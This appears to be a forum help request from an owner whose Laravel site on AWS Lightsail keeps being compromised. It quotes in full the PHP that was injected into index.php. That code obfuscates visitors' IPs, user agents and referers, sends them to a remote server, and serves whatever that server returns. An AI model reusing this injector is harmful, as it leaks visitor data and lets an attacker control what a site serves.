AWS Lightsail Instance Automatically Modifying Application Files Intermittently
One of my Lightsail instances (Ubuntu 20.04), which has worked well without any issues for the past few years, has started malfunctioning. I had set up a Laravel application on it. A couple of days ago, it began displaying a blank white page as the initial loading screen, and the application stopped working. When I checked the index.php file, I noticed that some new code had been added to it. Below is the anonymized code:

function e($url)
{
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $url);
    curl_setopt($ch, CURLOPT_USERAGENT, 'example-agent');
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($ch, CURLOPT_TIMEOUT, 30);
    curl_setopt($ch, CURLOPT_FRESH_CONNECT, true);
    $response = curl_exec($ch);
    curl_close($ch);
    return $response ? $response : '';
}

function de($data)
{
    $end = substr($data, -2);
    $array = str_split($data);
    $result = '';
    for ($i = 0; $i < count($array) - 2; $i += 2) {
        $result .= $array[$i + 1] . $array[$i];
    }
    $result .= $end;
    return $result;
}

$api = 'https://example.com/api';
$params = [
    'domain' => $_SERVER['HTTP_HOST'] ?? $_SERVER['SERVER_NAME'],
    'request_url' => $_SERVER['REQUEST_URI'],
    'ip' => $_SERVER['HTTP_X_FORWARDED_FOR'] ?? $_SERVER['REMOTE_ADDR'] ?? '',
    'agent' => $_SERVER['HTTP_USER_AGENT'] ?? '',
    'referer' => $_SERVER['HTTP_REFERER'] ?? '',
    'protocol' => isset($_SERVER['HTTPS']) ? 'https://' : 'http://',
    'language' => $_SERVER['HTTP_ACCEPT_LANGUAGE'] ?? '',
];

$attempts = 0;
while ($attempts < 3) {
    $url = sprintf('%s?r=%s', $api, de(base64_encode(implode('|', $params))));
    $content = e($url);
    $responseParts = explode('|', $content);
    if (!empty($responseParts) && isset($responseParts[1])) {
        header($responseParts[0]);
        echo $responseParts[1];
        exit;
    }
    $attempts++;
}
?>

Then I set up a cron job to reset the local code with Git every hour. This solution worked for a few days, but the issue has returned. This time, it has deleted a file, bringing the server entirely down with a 500 error. Since I have a basic AWS support plan, I cannot access technical support. Any suggestions on resolving this issue would be highly appreciated.
I do have snapshots enabled for the last 7 days, but I suspect it might be too late now, as the snapshots may already be affected by this issue.
Im expecting a guidance to fix this issue.
